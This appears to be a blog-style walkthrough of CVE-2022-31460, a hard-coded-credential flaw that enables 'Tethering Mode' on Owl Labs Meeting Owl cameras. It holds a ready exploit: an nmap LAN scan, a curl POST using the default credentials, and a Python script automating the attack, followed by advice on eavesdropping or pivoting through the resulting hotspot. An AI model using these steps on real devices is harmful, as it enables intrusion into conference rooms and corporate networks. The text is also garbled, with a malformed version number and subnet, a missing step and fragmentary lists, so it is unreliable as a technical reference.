CVE-2022-31460 - How Owl Labs Meeting Owl 5.2..15 Lets Attackers Trigger Tethering Mode with Default Credentials

In 2022, a vulnerability was discovered in the popular Owl Labs Meeting Owl — a smart 360° camera used in conference rooms around the world. The issue, now cataloged as CVE-2022-31460, lets attackers enable the device’s "Tethering Mode" remotely by leveraging hard-coded credentials. The vulnerability originally surfaced in firmware version 5.2..15 and is surprisingly easy to exploit. Let’s break down what this bug is, how it works, and why it matters.

Understanding the Meeting Owl

If you’ve seen a cylindrical camera in the middle of a conference table, that’s likely a Meeting Owl. It's a plug-and-play device integrating video, microphone, and speaker systems, and relies on Wi-Fi for updates and network access. For remote troubleshooting (or unfortunately, malicious intent), there's a “Tethering Mode” which can be toggled with special API commands.

The Vulnerability Explained

Research by Zachary Cutlip revealed that all Meeting Owl units running version 5.2..15 of the firmware (and possibly others) accept a hard-coded username and password when an attacker tries to enable Tethering Mode. These are not unique per device — they are *the same* on all Meeting Owls. Here's how it works:

The device has a REST-like API accessible on the local network.

- By POSTing to a specific endpoint with a certain c value (in this case, c=150), an attacker can activate Tethering Mode.

Password: hoothoot

Once Tethering Mode is enabled, the attacker could force the Owl to create a Wi-Fi hotspot, potentially leaking sensitive conference data or letting the attacker further compromise the device or network.

1. Locate an Owl on the Network

Owl Meeting devices are typically discoverable if you’re on the same LAN. Tools like nmap can help:

nmap -p 80 192.168.1./24

Look for web servers with characteristic headers or banners.

Using curl or your favorite HTTP tool, send the request like this

curl -u hoothoot:hoothoot -X POST \
     -d "c=150" \
     http://<owl-ip-address>/api/command

Replace <owl-ip-address> with the actual IP assigned to the device.

Here’s a simple Python script to automate it

import requests

owl_ip = '192.168.1.45'
url = f'http://{owl_ip}/api/command';
auth = ('hoothoot', 'hoothoot')
data = {'c': 150}

r = requests.post(url, auth=auth, data=data)
print('Status:', r.status_code)
print('Response:', r.text)

3. Collect Rewards (or Warnings)

If successful, the Meeting Owl will reboot into Tethering Mode, creating an unprotected Wi-Fi SSID. You can now join that network and attempt further attacks or eavesdrop — but any legitimate user in the room will lose regular access and might see physical indicators that the device is acting strangely.

Corporate Espionage: Anyone with local network access can hijack the room.

- Exposure: Unauthorized access to in-room video/audio streams or further network pivoting.

Responsible Disclosure and Mitigation

Owl Labs has released updates and some mitigations. Here’s what you can do if you run one of these devices:

1. Update Firmware: Make sure the software is current. Check their support page for patches.

More Information

- NIST CVE-2022-31460 Entry
- Zachary Cutlip's Blog Post
- Owl Labs Support
- Exploit Database

Conclusion

The Meeting Owl is a great tool for hybrid meetings, but this vulnerability shows the risks of using default/backdoor credentials and unsecured network APIs. Attackers can easily take control of conference room hardware, disrupt business, and potentially steal sensitive information. Always keep hardware updated and segment your networks!

Timeline

Published on: 06/02/2022 22:15:00 UTC
Last modified on: 07/08/2022 16:49:00 UTC